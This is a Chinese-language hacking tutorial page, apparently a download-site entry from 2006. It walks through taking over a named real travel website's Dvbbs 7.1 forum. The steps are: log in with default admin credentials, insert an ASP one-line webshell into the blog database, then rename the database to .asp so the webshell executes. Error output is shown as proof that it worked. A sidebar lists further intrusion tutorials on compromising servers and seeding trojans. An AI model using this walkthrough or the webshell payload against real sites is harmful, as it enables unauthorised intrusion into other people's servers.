|
| 运行环境: Win9x/NT/2000/XP/2003 | |
| 软件语言: 简体中文 | |
| 授权方式: 免费版 | |
| 软件属性: 热 荐 | |
| 解压密码: www.05112.org | |
| 添加时间: 2006-7-25 16:06:44 | |
| 下载次数:总计: |
今天讲的是 DVBBS7。1 利用 就是博客 获得WEBSHELL的一种方法
来看看这个网站 http://www.5195abc.com 一个和旅游有关的网站
有个论坛是 Powered By Dvbbs Version 7.1.0 Sp1 的 我们来看看
这个论坛管理员的帐号后台和前台都是一样的默认密码 admin admin888
好我们先进去 进入后台了
到这里有很多获得WEBSHELL的方法 我们这次用Dvbbs7。1自带的的BOKE来得到webshell
我已经激活了一个博客了
先在里面添加链接的版面
再在其中插入一句话木马到数据库 :<<%execute request("value")%>
下面通过博客数据库恢复来把.mdb转化为.asp的文件 BOKE数据库一般是boke/data/dvboke.mdb
好,我们看看行不行
有点慢 成功了 这些乱码就是数据库代码
Microsoft VBScript 运行时错误 错误 '800a000d'
类型不匹配: 'Execute'
/bbs/boke/data/dvboke.asp,行 843
说明我们的木马代码运行了 木马已经再数据库中了 下面我们写入木马
| 跨库到服务器+最新无ARP数据截持 | 09-27 |
| 利用5900端口入侵国外服务器 | 09-21 |
| 网站入侵拿服务器到网页漏洞完美 | 09-10 |
| 威博多用户商店漏洞 | 09-10 |
| 老漏洞再拿webshell(语音) | 08-18 |
| 批量入侵网站的教程 | 08-16 |
| 友情检测黑客网站 | 08-15 |
| Dns cache漏洞利用动画 | 08-06 |
| 利用1433端口简单抓肉鸡 | 07-30 |
| 风讯最新API注入漏洞利用动画 | 07-18 |
| 免费点亮支付通和蓝色拍拍 | 07-11 |
| MS07004挂马抓肉鸡详细演示 | 07-09 |
| 利用5900端口入侵国外服务器 | 09-21 |
| Dns cache漏洞利用动画 | 08-06 |
| 利用1433端口简单抓肉鸡 | 07-30 |
| 免费点亮支付通和蓝色拍拍 | 07-11 |
| MS07004挂马抓肉鸡详细演示 | 07-09 |
| 新漏洞新挂马法 | 07-09 |
| 超级简单的弱口令抓鸡 | 07-03 |
| shift后门深入利用及日抓百台服务 | 06-30 |
| 跨站脚本漏洞导致的浏览器劫持攻 | 06-22 |
| 伯乐asp收信程序漏洞利用工具+教 | 06-07 |